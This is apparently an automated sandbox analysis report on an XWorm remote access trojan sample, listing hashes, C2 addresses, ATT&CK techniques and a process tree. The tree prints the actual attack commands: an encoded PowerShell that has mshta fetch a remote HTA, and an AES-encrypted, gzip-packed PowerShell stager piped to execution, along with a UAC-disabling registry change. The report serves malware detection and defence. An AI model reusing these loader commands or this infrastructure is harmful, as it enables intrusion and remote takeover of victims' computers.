xworm | 7876f0415e0a2c190ea29756895ebff0c1251abf7aaf1061731b8346564ab571

Analysis

max time kernel
137s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-11-2024 14:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

105KB
MD5

edd1f792f4dcfaa2e3cc2cb30ab248e8
SHA1

2510594e8f4ba919813be0362e9fd7f0620680da
SHA256

7876f0415e0a2c190ea29756895ebff0c1251abf7aaf1061731b8346564ab571
SHA512

036bb0b4afeebc2e24675dcbd1973b7a54c70d0a33655b86582a19bfd116a78ba09344aedce2c3718a4ecaf894cd5d496019a8247fd9b8646f0c0c4b5cb30bf5
SSDEEP

384:AMjfVU+V4yg3d2xMGJn6BrfKNG99Sjvb99SjvWp:d7XCVMxylB9Sbh9Sb

Score

10^/10

xworm defense_evasion evasion execution rat trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://195.2.71.183:8081/0/3.hta

Extracted

Family

xworm

Version

5.0

89.110.95.189:7000

Mutex

imlO5snuY8Gb0egY

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000e000000023b7d-138.dat	family_xworm
behavioral2/memory/4816-140-0x0000000000A00000-0x0000000000A0E000-memory.dmp	family_xworm

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
6	2268	mshta.exe
23	3940	powershell.exe
28	3940	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4348	powershell.exe
1444	powershell.exe
1980	powershell.exe
404	powershell.exe
2316	powershell.exe
1396	powershell.exe
1152	powershell.exe
404	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
4816	XClient.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
3760	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
380	powershell.exe
380	powershell.exe
4348	powershell.exe
4348	powershell.exe
1152	powershell.exe
3940	powershell.exe
1152	powershell.exe
3940	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	380	powershell.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeDebugPrivilege	1152	powershell.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeDebugPrivilege	3760	taskkill.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	4816	XClient.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 3596 wrote to memory of 380	3596	file.exe	84
PID 3596 wrote to memory of 380	3596	file.exe	84
PID 380 wrote to memory of 2268	380	powershell.exe	86
PID 380 wrote to memory of 2268	380	powershell.exe	86
PID 2268 wrote to memory of 4348	2268	mshta.exe	90
PID 2268 wrote to memory of 4348	2268	mshta.exe	90
PID 4348 wrote to memory of 2672	4348	powershell.exe	92
PID 4348 wrote to memory of 2672	4348	powershell.exe	92
PID 2672 wrote to memory of 1152	2672	cmd.exe	94
PID 2672 wrote to memory of 1152	2672	cmd.exe	94
PID 2672 wrote to memory of 3940	2672	cmd.exe	95
PID 2672 wrote to memory of 3940	2672	cmd.exe	95
PID 3940 wrote to memory of 1444	3940	powershell.exe	100
PID 3940 wrote to memory of 1444	3940	powershell.exe	100
PID 1444 wrote to memory of 1640	1444	powershell.exe	101
PID 1444 wrote to memory of 1640	1444	powershell.exe	101
PID 1640 wrote to memory of 2548	1640	csc.exe	102
PID 1640 wrote to memory of 2548	1640	csc.exe	102
PID 1444 wrote to memory of 632	1444	powershell.exe	103
PID 1444 wrote to memory of 632	1444	powershell.exe	103
PID 3940 wrote to memory of 2316	3940	powershell.exe	117
PID 3940 wrote to memory of 2316	3940	powershell.exe	117
PID 2316 wrote to memory of 2888	2316	powershell.exe	118
PID 2316 wrote to memory of 2888	2316	powershell.exe	118
PID 2888 wrote to memory of 4780	2888	csc.exe	119
PID 2888 wrote to memory of 4780	2888	csc.exe	119
PID 2316 wrote to memory of 2652	2316	powershell.exe	120
PID 2316 wrote to memory of 2652	2316	powershell.exe	120
PID 3940 wrote to memory of 1396	3940	powershell.exe	122
PID 3940 wrote to memory of 1396	3940	powershell.exe	122
PID 1360 wrote to memory of 984	1360	csc.exe	124
PID 1360 wrote to memory of 984	1360	csc.exe	124

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -EncodedCommand LgAgAFwAVwAqAFwAUwAqADIAXABtACoAaAA/AGEALgAqACAAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAyAC4ANwAxAC4AMQA4ADMAOgA4ADAAOAAxAC8AMAAvADMALgBoAHQAYQAnAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:380
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" http://195.2.71.183:8081/0/3.hta
    3⤵
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $TClKmziEWmosG = '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';$VlGSTkbht = 'd2VVYnVHQ0NDSFlMTXlFSkxvUGdHaXdVaHBCRWRCS0E=';$SRNaIQFHDizwDgTj = New-Object 'System.Security.Cryptography.AesManaged';$SRNaIQFHDizwDgTj.Mode = [System.Security.Cryptography.CipherMode]::ECB;$SRNaIQFHDizwDgTj.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$SRNaIQFHDizwDgTj.BlockSize = 128;$SRNaIQFHDizwDgTj.KeySize = 256;$SRNaIQFHDizwDgTj.Key = [System.Convert]::FromBase64String($VlGSTkbht);$NwMth = [System.Convert]::FromBase64String($TClKmziEWmosG);$JKhNnvEx = $NwMth[0..15];$SRNaIQFHDizwDgTj.IV = $JKhNnvEx;$mvsducbRAZkUxMqS = $SRNaIQFHDizwDgTj.CreateDecryptor();$yPjGsJSEmjKauUF = $mvsducbRAZkUxMqS.TransformFinalBlock($NwMth, 16, $NwMth.Length - 16);$SRNaIQFHDizwDgTj.Dispose();$xUPO = New-Object System.IO.MemoryStream( , $yPjGsJSEmjKauUF );$YMyEccnrL = New-Object System.IO.MemoryStream;$WMPoNXbMaHhwdvzm = New-Object System.IO.Compression.GzipStream $xUPO, ([IO.Compression.CompressionMode]::Decompress);$WMPoNXbMaHhwdvzm.CopyTo( $YMyEccnrL );$WMPoNXbMaHhwdvzm.Close();$xUPO.Close();[byte[]] $SAXgTOHhY = $YMyEccnrL.ToArray();$cuWCIzLMpJ = [System.Text.Encoding]::UTF8.GetString($SAXgTOHhY);$cuWCIzLMpJ | powershell - }
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4348
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powershell.exe $TClKmziEWmosG = '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